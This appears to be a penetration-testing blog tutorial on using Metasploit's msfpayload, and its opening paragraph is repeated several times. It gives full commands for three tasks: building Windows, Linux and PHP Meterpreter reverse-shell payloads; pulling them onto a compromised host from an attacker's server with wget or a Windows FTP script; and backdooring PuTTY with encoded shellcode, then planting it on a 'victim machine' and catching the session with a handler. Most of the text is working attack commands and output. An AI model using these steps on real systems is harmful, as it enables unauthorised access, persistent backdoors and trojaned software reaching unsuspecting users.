Msfpayload is part of the Metasploit framework and allows us to generate Metasploit payloads into various formats. You may want to upgrade your raw shell to a meterpreter shell because you have a lot of increased functionality. You can also backdoor a legit executable for persistence.
Msfpayload is part of the Metasploit framework and allows us to generate Metasploit payloads into various formats. You may want to upgrade your raw shell to a meterpreter shell because you have a lot of increased functionality. You can also backdoor a legit executable for persistence.
Msfpayload is part of the Metasploit framework and allows us to generate Metasploit payloads into various formats. You may want to upgrade your raw shell to a meterpreter shell because you have a lot of increased functionality. You can also backdoor a legit executable for persistence.
Msfpayload is part of the Metasploit framework and allows us to generate Metasploit
payloads into various formats. In our previous blog posts, we leveraged msfpayload to generate raw shellcode that we leveraged in our buffer overflow for code execution. Now we will go over some other use cases for msfpayload to generate some meterpreter payloads. You will often find yourself wanting to upgrade your raw shell to a meterpreter shell because you have a lot of increased functionality, or you may want to backdoor a legit executable for persistence. Create a Meterpeter payload to upgrade your raw shell: 1 2 3 # Windows Meterpreter Reverse Shell: msfpayload windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> X > win_meter.exe
4 5 6 7 8 # Linux x86 Meterpreter Reverse Shell: msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> X > lin_meter.exe
# PHP Meterpreter Reverse Shell: msfpayload php/meterpreter_reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> R > php_meter.php Pull Over Binary on Linux: To upgrade your raw shell to meterpreter you can follow this process for Linux: Optional: Spawn a Pseudo-Terminal with Python To create a python HTTP server the built-in function SimpleHTTPServer can be leveraged. You can invoke a module directly from the command line with switch - m. By default the listener will start on port 8000, but you can specify the port youd like to use as an argument: 1 2 python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 80 ... Now assuming you dont have a firewall blocking connections you should be able to issue requests to the server. You can place your meterpreter binary in the same directory that you started the Python HTTP server and it should be accessible by a remote client. Here is an example of how you might want to leverage wget. I find it very common in cases where you land an initial web shell that you dont have permission to write in the current working directory, and you lack the ability to change directories. So to solve the problem you can do the following: 1 2 3 4 5 6 7 8 9 10 11 # Switch -O allows you to output to another directory - /tmp/ is often writable wget -O /tmp/<meterpeter_binary> http://<attacker_ip>/<meterpeter_binary>
# Always a good idea to make sure the file pulled over properly file /tmp/<meterpeter_binary>
# Run the meterpreter binary /tmp/<meterpeter_binary>
Pull Over Binary on Windows: To upgrade your raw shell to meterpreter on Windows you can do some CLI Kung Fu. This helps you get around the issues with raw shell and not handling certain commands that require additional input: 1 2 3 4 5 6 7 8 9 10 11 # You can build up the FTP script line by line # Don't spaces with username/passwords as they'll mess up authentication C:\>echo open [attacker_ip] >> ftp.txt
C:\>echo [user]>>ftp.txt
C:\>echo [password]>>ftp.txt
C:\>echo get [meterpreter_binary]>>ftp.txt
C:\>echo bye >> ftp.txt Now you can leverage the built-in Windows FTP client with switch -s and use your FTP script file you created: 1 2 3 4 5 6 7 c:\>ftp -s:ftp.txt ftp.exe -s:ftp.txt User ([attacker_ip]:(none)): open [attacker_ip] get [meterpreter_binary] bye
c:\> dir /s | findstr [meterpreter_binary] Now if you want to leverage msfpayload to backdoor a legitimate binary you can do the following: 1 2 3 4 5 6 ~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=443 R | msfencode -t exe -x /tmp/putty.exe -k -o putty_bad.exe -e x86/shikata_ga_nai -c 3 [*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3) In this example we decided to backdoor PuTTY, but could have been any binary. Switch -t specifies the output format, -x specifies an alternate executable template to use, -o specifies the output file, and switch -e the encoded to use. Now we can plant the backdoored executable on the victim machine, start up an listener, and test it out: 1 2 3 4 5 6 7 8 9 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.56.102 LHOST => 192.168.56.102 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.102:443 [*] Starting the payload handler... 10 Now assuming everything worked properly, when you click the PuTTY binary on the
victim machine you should see your Meterpreter session spawn: